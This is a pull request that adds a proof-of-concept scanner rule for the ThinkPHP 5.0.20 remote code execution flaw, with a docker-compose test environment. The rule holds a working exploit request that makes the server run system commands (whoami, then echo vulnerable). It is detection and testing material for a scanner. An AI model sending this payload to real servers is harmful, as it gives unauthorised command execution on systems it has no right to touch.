### PR TITLE
tp5.0.20update

### DIFF
--- a/pocs/tp5020-docker-compose.yml
+++ b/pocs/tp5020-docker-compose.yml
@@ -1,0 +1,6 @@
+version: '3'
+services:
+ web:
+   image: vulhub/thinkphp:5.0.20
+   ports:
+    - "8080:80"

--- a/pocs/tp5020-poc.yml
+++ b/pocs/tp5020-poc.yml
@@ -2,6 +2,6 @@ name: poc-yaml-tp5.0.20
 rules:
   - method: GET
     path: >-
-      /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
-    follow_redirects: true
-    expression: status==200
+      /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20vulnerable
+    follow_redirects: false
+    expression: status==200 && body.bcontains(b'vulnerable')

--- a/pocs/tp5020-poc.yml
+++ b/pocs/tp5020-poc.yml
@@ -1,0 +1,7 @@
+name: poc-yaml-tp5.0.20
+rules:
+  - method: GET
+    path: >-
+      /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
+    follow_redirects: true
+    expression: status==200


### PR DESCRIPTION
## Summary
what POC is this PR for?
thinkphp 5.0.20-rce
## POC

```yaml
name: poc-yaml-tp5.0.20
rules:
  - method: GET
    path: >-
      /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20vulnerable
    follow_redirects: false
    expression: status==200 && body.bcontains(b'vulnerable')
```

## Test Environment
http://39.105.202.187:8080
The vuln can be reproduced in the following docker environment.

Dockerfile: 
```dockerfile

```
Or docker-compose:
```
version: '3'
services:
 web:
   image: vulhub/thinkphp:5.0.20
   ports:
    - "8080:80"
```

## Remarks

Write you voice here.
